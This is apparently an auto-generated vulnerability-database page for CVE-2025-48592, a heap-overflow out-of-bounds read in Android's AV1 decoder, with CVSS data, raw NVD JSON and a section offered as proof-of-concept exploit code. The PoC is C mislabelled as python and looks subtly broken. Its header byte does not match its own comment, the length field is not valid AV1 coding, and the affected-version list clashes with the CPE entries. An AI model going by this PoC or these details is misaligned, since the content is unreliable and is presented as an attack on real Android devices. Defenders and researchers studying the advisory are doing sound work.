Security Vulnerability Report
中文
CVE-2025-48592 CVSS 7.5 HIGH

CVE-2025-48592

Published: 2025-12-08 17:16:16
Last Modified: 2025-12-08 21:15:57
Source: [email protected]

Description

In initDecoder of C2SoftDav1dDec.cpp, there is a possible out of bounds read due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:* - VULNERABLE
Android frameworks/av (C2SoftDav1dDec) < 2025-12-01安全补丁
Android 12L (API级别32)
Android 13 (API级别33)
Android 14 (API级别34)
Android 15 (API级别35)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-48592 PoC - Android AV1 Decoder Heap Overflow // Generate malicious AV1 video stream to trigger OOB read in C2SoftDav1dDec #include <stdio.h> #include <stdlib.h> #include <string.h> // AV1 OBU (Open Bitstream Unit) header structure typedef struct { unsigned int forbidden_bit:1; unsigned int type:4; unsigned int extension_flag:1; unsigned int has_size:1; unsigned int reserved:1; } OBUHeader; // Malicious payload to trigger heap buffer overflow unsigned char* create_malicious_av1_payload(size_t* out_size) { // Craft OBU with oversized data to trigger OOB read unsigned char* payload = malloc(1024); memset(payload, 0, 1024); // OBU header - Frame header type payload[0] = 0x0A; // type=5 (OBU_FRAME), has_size=1 // Size field (large value to cause overflow) payload[1] = 0xFF; payload[2] = 0xFF; payload[3] = 0xFF; // Fill with data that will trigger OOB read when parsed memset(payload + 4, 0x41, 1020); // Pattern to identify leaked data *out_size = 1024; return payload; } // Simulate triggering the vulnerable code path void trigger_vulnerability() { size_t payload_size; unsigned char* malicious_data = create_malicious_av1_payload(&payload_size); // This would be called in the context of C2SoftDav1dDec::initDecoder // In real exploitation, the video would be processed by Android MediaCodec printf("[*] Malicious AV1 payload created: %zu bytes\n", payload_size); printf("[*] Send this payload to Android AV1 decoder via MediaCodec\n"); free(malicious_data); } int main() { printf("CVE-2025-48592 PoC - Android AV1 Decoder Heap Overflow\n"); printf("Target: C2SoftDav1dDec::initDecoder in frameworks/av\n"); printf("Vulnerability: Heap buffer overflow leading to OOB read\n\n"); trigger_vulnerability(); printf("\n[*] Note: This PoC demonstrates the concept.\n"); printf("[*] Actual exploitation requires Android device with vulnerable version.\n"); return 0; } // Python script to generate malicious AV1 file /* #!/usr/bin/env python3 import struct def generate_malicious_av1(): # Craft AV1 OBU with oversized payload obu_header = bytes([0x0A]) # OBU_FRAME with size size = struct.pack('>I', 0xFFFF) # Oversized length payload = b'\x41' * 0xFFFF # Fill data with open('malicious.av1', 'wb') as f: f.write(obu_header + size + payload) print(f"Generated malicious AV1 file: {len(obu_header + size + payload)} bytes") if __name__ == '__main__': generate_malicious_av1() */

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-48592", "sourceIdentifier": "[email protected]", "published": "2025-12-08T17:16:16.407", "lastModified": "2025-12-08T21:15:56.860", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In initDecoder of C2SoftDav1dDec.cpp, there is a possible out of bounds read due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "8538774C-906D-4B03-A3E7-FA7A55E0DA9E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "2D49E611-5D53-479D-A981-42388FDC0E8D"}]}]}], "references": [{"url": "https://android.googlesource.com/platform/frameworks/av/+/8febdebcb5e8736ec013a7d64e70f50e87649b52", "source": "[email protected]", "tags": ["Patch", "Product"]}, {"url": "https://source.android.com/security/bulletin/2025-12-01", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.